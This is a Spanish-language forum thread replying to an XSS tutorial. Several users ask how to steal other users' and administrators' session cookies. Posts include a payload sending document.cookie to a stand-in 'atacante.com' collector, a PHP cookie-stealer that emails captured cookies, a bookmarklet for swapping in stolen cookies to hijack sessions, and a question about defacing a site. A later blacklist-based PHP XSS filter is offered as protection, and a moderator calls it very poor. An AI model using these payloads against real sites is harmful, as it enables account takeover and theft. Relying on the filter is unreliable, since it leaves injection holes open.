 Autor
|
Tema: [::Tutorial::] - Ataques XSS (Leído 94,334 veces)
|
Ch@CaL
 Desconectado
Mensajes: 27
All in your mind....
|
Muy buen manual man xo tengo una duda,yo entro x ejemplo en el foro,xa ello me he de registrar x lo tanto he de ser usuario xa poder colocar la url entonces al ser usuiario xa que quiero saber el pass de otro user me interesaria saber la del admin mejor no?ahi supongo que entra a formar parte la ingenieria social.Me apareceran en el text todas las cookies de todos los que lo pinxen?
|
|
|
|
|
En línea
|
Ch@CaL
|
|
|
|Azrack|
Desconectado
Mensajes: 102
Enjoy The Silence
|
y si yo le paaso solo el enlace: http://www.atacante.com/cookies.php?cookie='+document.cookie;</script> no serviria xq para robar la cookie la redirecion tiene q' ser desde la web vulnerable?
|
|
|
|
|
En línea
|
Hay gente tan Ignorante que cree en dios.  Status MSN:>>  << |
|
|
security
Desconectado
Mensajes: 1
|
<script>alert()</script>
|
|
|
|
|
En línea
|
|
|
|
Dr. Stephen Falken
Desconectado
Mensajes: 1
|
A día de hoy esta vulnerabilidad está casi capada. No?
|
|
|
|
|
En línea
|
|
|
|
NaphacK
Desconectado
Mensajes: 12
|
A día de hoy esta vulnerabilidad está casi capada. No?
No, aun se siguen encontrando vulnerables... Aunque tengo una duda... Que pasa si la pagina me dio acceso a unos archivos tipo ftp, lo que pasa es que me queda de una forma asi: www.webvulnerable.com/free-press/unaslibrerias por esas librerias puedo navegar tranquilamente, y son scripts en java y php... Osea, aunque no sea un boton buscar, puedo ejecutar igual la url maligna? Saludos... 
|
|
|
|
|
En línea
|
|
|
|
merinodaniel
Desconectado
Mensajes: 1
|
hola a toos, justo he estado investigando XSS, y encontre q tb se puede hacer q se envie la cookie a un mail... <?php
$cookie = $_GET["cookie"];
mail("admin@gensale.net", "Cookie stealer report", $cookie);
?> este codigo seria para la pag: cookie.php Este codigo fue publicado en el blog: blog.gensale.net Yo no soy el autor.. byes |
|
|
|
|
En línea
|
|
|
|
R007h
Desconectado
Mensajes: 106
<script>alert('xss');</script>
|
Hola, sta muy bueno el txt... ya me consegui unas cookies pero cuando me voy al site y pongo javascript: prompt('',document.cookie);
luego reemplazo las cookies por las que yo consegui, no pasa nada, sigue estando cerrada la session de mi victima, que pasa? |
|
|
|
|
En línea
|
<script>alert('xss');</scrip>
|
|
|
sirdarckcat
Troll Buena Onda y
CoAdmin
Desconectado
Mensajes: 6.946
Lavando Platos
|
usa este:
javascript:void prompt("Introduce la cookie:",document.cookie).replace(/[^;]+/g,function(_){document.cookie=_;});
|
|
|
|
|
En línea
|
|
|
|
slackbyte
Desconectado
Mensajes: 81
|
Que tal amigo, tengo una duda pues estoy algo novato en cuanto a los ataques XSS, un amigo queria que probara su servidor en busca de vulnerabilidades, y pues le intente con varias cosas, pero al probar lo de pnoer en el campo de texto <script>alert('vulnerable')</script> resulta que me saltó el mensaje de vulnerable. Ahora, la pregunta es ¿como puedo hacer un deface en su servidor? (conste que este chavo me dijo que no habia problema que le hiciera lo que quisiera a su sitio =P), es decir, yo puedo probar con:
<META HTTP-EQUIV="refresh" CONTENT="1; url=http://www.google.com">
y con esto lograré que cualquier persona que entre a su sitio, sea redireccionado a google? pregunto esto ya que con el ejemplo del alert() a pesar de que me manda el mensaje, al actualizar el sitio ya no me devuelve el mensaje, y lo que quiero es que esa configuracion se quede guardada, o algo por el estilo consiste el ataque xss no es asi? me gustaria me apoyaras con un poco de explicacion al respecto, de como puedo alterar el sitio y otros usuarios puedan ver esos cambios. muchas gracias.
|
|
|
|
|
En línea
|
|
|
|
KarlosVid(ÊÇ)
Desconectado
Mensajes: 493
..::(KarlosVidEC)::..
|
Este es el Codigo permite proteger ataques xss  <?php
function xss($val) {
$patron = '[ ]+';
$val= ereg_replace($patron,' ', $val);
$patron = '[ ]*>';
$val= ereg_replace($patron,'>', $val);
$a=array('xml','script', 'applet','embed','iframe','frame', 'frameset','ilayer');
$tot=count($a)-1;
for($i=0;$i<=$tot;$i++){
$tag='<'.$a[$i];
if(strpos($val,$tag)!==false){
$patron = $tag.'(.*)>(.*)<\/'.$a[$i].'[ ]*>';
$val= eregi_replace($patron,'', $val);
}
}
$a=array('link','meta','base');
$tot=count($a)-1;
for($i=0;$i<=$tot;$i++){
if(strpos($val,'<'.$a[$i])!==false){
$val= str_ireplace('<'.$a[$i],'<x',$val);
}
}
$a=array('onabort', 'onactivate', 'onafterprint', 'onafterupdate', 'onbeforeactivate', 'onbeforecopy', 'onbeforecut', 'onbeforedeactivate', 'onbeforeeditfocus', 'onbeforepaste', 'onbeforeprint', 'onbeforeunload', 'onbeforeupdate', 'onblur', 'onbounce', 'oncellchange', 'onchange', 'onclick', 'oncontextmenu', 'oncontrolselect', 'oncopy', 'oncut', 'ondataavailable', 'ondatasetchanged', 'ondatasetcomplete', 'ondblclick', 'ondeactivate', 'ondrag', 'ondragend', 'ondragenter', 'ondragleave', 'ondragover', 'ondragstart', 'ondrop', 'onerror', 'onerrorupdate', 'onfilterchange', 'onfinish', 'onfocus', 'onfocusin', 'onfocusout', 'onhelp', 'onkeydown', 'onkeypress', 'onkeyup', 'onlayoutcomplete', 'onload', 'onlosecapture', 'onmousedown', 'onmouseenter', 'onmouseleave', 'onmousemove', 'onmouseout', 'onmouseover', 'onmouseup', 'onmousewheel', 'onmove', 'onmoveend', 'onmovestart', 'onpaste', 'onpropertychange', 'onreadystatechange', 'onreset', 'onresize', 'onresizeend', 'onresizestart', 'onrowenter', 'onrowexit', 'onrowsdelete', 'onrowsinserted', 'onscroll', 'onselect', 'onselectionchange', 'onselectstart', 'onstart', 'onstop', 'onsubmit', 'onunload','http-equiv','content','charset');
$tot=count($a)-1;
for($i=0;$i<=$tot;$i++){
if(strpos($val,$a[$i].'=')!==false){
$val= str_ireplace($a[$i].'=','',$val);
}
}
return $val;
}
?>
:: wWw.SiDAT.Tk - wWw.SiDAT.Tk -wWw.SiDAT.Tk - wWw.SiDAT.Tk :: |
|
|
|
|
En línea
|
|
|
|
KarlosVid(ÊÇ)
Desconectado
Mensajes: 493
..::(KarlosVidEC)::..
|
Probando el Ejemplo: xss.php (nombre del php que contiene la funcion xss) <html><head>
<title>Ataques XSS</title>
</head>
<body>
<form id="form1" name="form1" method="post" action="XSS1.php">
Nombre usuario
<input name="txt_nom" type="text" id="txt_nom" size="80" />
<input type="submit" name="button" id="button" value="Enviar" />
</form>
</body>
</html>
:: wWw.SiDAT.Tk - wWw.SiDAT.Tk -wWw.SiDAT.Tk - wWw.SiDAT.Tk :: |
|
|
|
|
En línea
|
|
|
|
KarlosVid(ÊÇ)
Desconectado
Mensajes: 493
..::(KarlosVidEC)::..
|
Dentro de XSS1.php, escribimos esto: <?php
include('xss.php');
$nom = $_POST['txt_nom'];
$nom = xss($nom);
echo $nom;
?>
:: wWw.SiDAT.Tk - wWw.SiDAT.Tk -wWw.SiDAT.Tk - wWw.SiDAT.Tk :: |
|
|
|
|
En línea
|
|
|
|
sirdarckcat
Troll Buena Onda y
CoAdmin
Desconectado
Mensajes: 6.946
Lavando Platos
|
esa es una pesima funcion para proteger contra ataques de xss..
|
|
|
|
|
En línea
|
|
|
|
Og.
Desconectado
Mensajes: 813
Aprendiendo de la vida
|
esa es una pesima funcion para proteger contra ataques de xss..
mmm por que? al menos yo no le veo un bug
|
|
|
|
|
En línea
|
|-
|
|
|
KarlosVid(ÊÇ)
Desconectado
Mensajes: 493
..::(KarlosVidEC)::..
|
sirdarckcat, quiero saber a que se debe su comentario.  . Me gustaria saber su respuesta, gracias.
|
|
|
|
« Última modificación: 3 Noviembre 2009, 20:03 por KarlosVid(ÊÇ) »
|
En línea
|
|
|
|
|
 |
